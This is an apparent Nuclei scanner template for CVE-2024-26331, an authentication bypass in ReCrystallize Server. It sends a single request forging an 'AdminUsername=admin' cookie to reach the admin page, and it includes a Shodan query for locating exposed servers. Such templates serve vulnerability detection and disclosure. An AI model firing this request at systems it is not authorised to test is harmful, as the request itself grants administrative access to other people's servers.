id: CVE-2024-26331

info:
  name: ReCrystallize Server - Authentication Bypass
  author: Carson Chan
  severity: high
  description: |
    This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
  reference:
    - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
    - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
    - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm
    - https://github.com/Ostorlab/KEV
  classification:
    epss-score: 0.00053
    epss-percentile: 0.21091
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"ReCrystallize"
  tags: cve,recrystallize,auth-bypass,cve2024

http:
  - method: GET
    path:
      - "{{BaseURL}}/Admin/Admin.aspx"

    headers:
      Cookie: "AdminUsername=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ReCrystallize Server Administration"
          - "License Status:"
          - "System Info"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200f98d8732efab432fb4a5776fb0cffdfa3bab1be29596883a3f08213b7a32c77022051ca3c0c66461b6fb3cb1c9ccbd1040c30467f4e59e830fd2bdc7f88370b331e:922c64590222798bb761d5b6d8e72950